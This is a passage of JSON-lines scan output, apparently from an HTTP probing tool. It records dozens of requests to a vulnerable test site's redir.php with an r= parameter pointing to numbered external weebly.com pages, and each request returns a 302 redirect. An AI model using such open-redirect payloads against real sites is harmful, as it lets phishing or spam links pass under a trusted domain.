Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:01.876787114Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal26.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal26.weebly.com\",\"location\":\"http://indonesianormal26.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal26.weebly.com\",\"time\":\"339.695774ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:01.913995572Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal27.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal27.weebly.com\",\"location\":\"http://indonesianormal27.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal27.weebly.com\",\"time\":\"351.737273ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:01.956216204Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal28.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal28.weebly.com\",\"location\":\"http://indonesianormal28.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal28.weebly.com\",\"time\":\"343.890864ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:01.956500719Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal29.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal29.weebly.com\",\"location\":\"http://indonesianormal29.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal29.weebly.com\",\"time\":\"343.806136ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.256949331Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal30.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal30.weebly.com\",\"location\":\"http://indonesianormal30.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal30.weebly.com\",\"time\":\"343.909763ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.315183969Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal31.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal31.weebly.com\",\"location\":\"http://indonesianormal31.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal31.weebly.com\",\"time\":\"339.667186ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.34541145Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal32.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal32.weebly.com\",\"location\":\"http://indonesianormal32.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal32.weebly.com\",\"time\":\"357.465441ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.417188738Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal33.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal33.weebly.com\",\"location\":\"http://indonesianormal33.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal33.weebly.com\",\"time\":\"348.384242ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.439251822Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal34.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal34.weebly.com\",\"location\":\"http://indonesianormal34.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal34.weebly.com\",\"time\":\"351.583559ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.535380382Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal35.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal35.weebly.com\",\"location\":\"http://indonesianormal35.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal35.weebly.com\",\"time\":\"348.938302ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.594378649Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal36.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal36.weebly.com\",\"location\":\"http://indonesianormal36.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal36.weebly.com\",\"time\":\"339.478683ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.648722529Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal37.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal37.weebly.com\",\"location\":\"http://indonesianormal37.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal37.weebly.com\",\"time\":\"338.627161ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.699046025Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal38.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal38.weebly.com\",\"location\":\"http://indonesianormal38.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal38.weebly.com\",\"time\":\"343.245103ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.7837499Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal39.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal39.weebly.com\",\"location\":\"http://indonesianormal39.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal39.weebly.com\",\"time\":\"352.558581ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.851398764Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal40.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal40.weebly.com\",\"location\":\"http://indonesianormal40.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal40.weebly.com\",\"time\":\"344.20421ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:02.948230299Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal41.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal41.weebly.com\",\"location\":\"http://indonesianormal41.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal41.weebly.com\",\"time\":\"350.594841ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:06.131382767Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal42.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal42.weebly.com\",\"location\":\"http://indonesianormal42.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal42.weebly.com\",\"time\":\"345.577148ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:06.325514186Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal43.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal43.weebly.com\",\"location\":\"http://indonesianormal43.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal43.weebly.com\",\"time\":\"350.694674ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:06.384351419Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal44.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal44.weebly.com\",\"location\":\"http://indonesianormal44.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal44.weebly.com\",\"time\":\"343.90577ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:06.43840214Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal45.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal45.weebly.com\",\"location\":\"http://indonesianormal45.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal45.weebly.com\",\"time\":\"355.383864ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:06.811333266Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal46.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal46.weebly.com\",\"location\":\"http://indonesianormal46.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal46.weebly.com\",\"time\":\"351.432554ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:07.226917243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal47.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal47.weebly.com\",\"location\":\"http://indonesianormal47.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal47.weebly.com\",\"time\":\"352.302674ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:07.266982107Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal48.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal48.weebly.com\",\"location\":\"http://indonesianormal48.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal48.weebly.com\",\"time\":\"356.17926ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:07.432076792Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal49.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal49.weebly.com\",\"location\":\"http://indonesianormal49.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal49.weebly.com\",\"time\":\"346.082432ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:07.979001308Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal50.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal50.weebly.com\",\"location\":\"http://indonesianormal50.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal50.weebly.com\",\"time\":\"349.345981ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:08.02513293Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal51.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal51.weebly.com\",\"location\":\"http://indonesianormal51.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal51.weebly.com\",\"time\":\"347.925821ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:09.717808708Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal52.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal52.weebly.com\",\"location\":\"http://indonesianormal52.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal52.weebly.com\",\"time\":\"349.273236ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:11.001017013Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal53.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal53.weebly.com\",\"location\":\"http://indonesianormal53.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal53.weebly.com\",\"time\":\"356.282601ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:11.055831254Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal54.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal54.weebly.com\",\"location\":\"http://indonesianormal54.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal54.weebly.com\",\"time\":\"343.450052ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:11.374044541Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal55.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal55.weebly.com\",\"location\":\"http://indonesianormal55.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal55.weebly.com\",\"time\":\"339.489955ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.228064845Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal56.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal56.weebly.com\",\"location\":\"http://indonesianormal56.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal56.weebly.com\",\"time\":\"349.800261ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.256185282Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal57.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal57.weebly.com\",\"location\":\"http://indonesianormal57.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal57.weebly.com\",\"time\":\"340.407772ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.301605838Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal59.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal59.weebly.com\",\"location\":\"http://indonesianormal59.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal59.weebly.com\",\"time\":\"343.163514ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.310220912Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal58.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal58.weebly.com\",\"location\":\"http://indonesianormal58.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal58.weebly.com\",\"time\":\"352.307956ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.610863532Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal60.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal60.weebly.com\",\"location\":\"http://indonesianormal60.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal60.weebly.com\",\"time\":\"352.376108ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.668986941Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal61.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal61.weebly.com\",\"location\":\"http://indonesianormal61.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal61.weebly.com\",\"time\":\"351.548239ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.691349023Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal62.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal62.weebly.com\",\"location\":\"http://indonesianormal62.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal62.weebly.com\",\"time\":\"343.43053ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"P